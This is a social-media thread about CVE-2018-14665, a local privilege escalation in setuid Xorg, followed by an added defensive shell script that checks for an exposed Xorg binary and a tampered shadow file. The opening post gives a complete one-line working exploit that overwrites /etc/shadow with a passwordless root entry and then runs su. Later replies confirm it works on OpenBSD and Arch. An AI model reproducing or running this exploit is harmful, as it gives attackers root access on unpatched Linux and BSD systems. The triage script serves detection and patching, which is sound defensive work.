Hacker Fantastic
CVE-2018-14665 - a LPE exploit via fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
Hacker Fantastic 25 Oct 18
Replying to @info_dox
werd, you used the same technique in an earlier exploit against gnu-screen - I use that bug in my training, you are using the default shell (presumed bash) which drops privileges on most systems using your technique after the shell execve's. It's less reliable that way.
Will Dormann 25 Oct 18
XOrg on OpenBSD (I tested 6.3) definitely clobbers root-owned files with this technique. :-/
Hacker Fantastic 26 Oct 18
Replying to @pwned4ever @nushinde
Bug found by - my contribution was noticing its 0day status in OpenBSD and making PoC.
Hacker Fantastic 26 Oct 18
the old file is backed up to /etc/shadow.old
Louis Dion-Marcil 25 Oct 18
Replying to @hackerfantastic
To be fair, Xorg needs to be setuid for this to work, which it hasn't been for a while on most end-user distros. Server distros, like redhat/centos, are a different story.
A̙̪̰̮̠̻l̷̼̘͚̣̭̻é̻͓x̬͓̹e̗̩y̛͈͖̝̹̪͉a̦̲͉̟̮͕̻͡n̷̺̱ 25 Oct 18
I was able to reproduce this on a current Arch system. But had to do it from a tty.
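Added example, not part of the thread or written by any of its participants: a triage sketch for the two conditions the replies mention, a setuid-root Xorg binary and a clobbered shadow file with a .old copy left beside it. The default paths /usr/bin/Xorg and /etc/shadow and all function names are assumptions; pass your own paths as arguments.

```shell
#!/bin/sh
# Added triage sketch (not from the thread). Default paths are assumptions.

# Succeeds if $1 is a root-owned setuid file: the precondition noted in the thread.
xorg_is_setuid_root() {
    [ -f "$1" ] && [ -u "$1" ] && [ "$(ls -ln "$1" | awk '{print $3}')" = "0" ]
}

# Count non-empty lines that lack the 9 colon-separated fields of shadow(5).
# Log output written over the file shows up here as malformed lines.
shadow_malformed_lines() {
    awk -F: 'NF && NF != 9 { n++ } END { print n + 0 }' "$1"
}

# List accounts whose password field is empty (login without a password),
# which is the shape of the entry quoted in the original tweet.
shadow_empty_password_users() {
    awk -F: 'NF == 9 && $2 == "" { print $1 }' "$1"
}

# Print a report for one Xorg binary and one shadow-format file.
xorg_triage() {
    bin=${1:-/usr/bin/Xorg}; shadow=${2:-/etc/shadow}
    if xorg_is_setuid_root "$bin"; then
        echo "EXPOSED: $bin is setuid root"
    else
        echo "ok: $bin is absent or not setuid root"
    fi
    # The thread notes the previous file is kept as <name>.old.
    [ -e "$shadow.old" ] && echo "CHECK: $shadow.old exists, compare it with $shadow"
    if [ -r "$shadow" ]; then
        echo "malformed lines in $shadow: $(shadow_malformed_lines "$shadow")"
        for u in $(shadow_empty_password_users "$shadow"); do
            echo "ALERT: empty password field for $u"
        done
    else
        echo "skip: $shadow not readable (run as root)"
    fi
    return 0
}

xorg_triage "$@"
```

Where the binary is reported as setuid root, removing the bit (chmod u-s) or installing the vendor's fixed package closes the precondition.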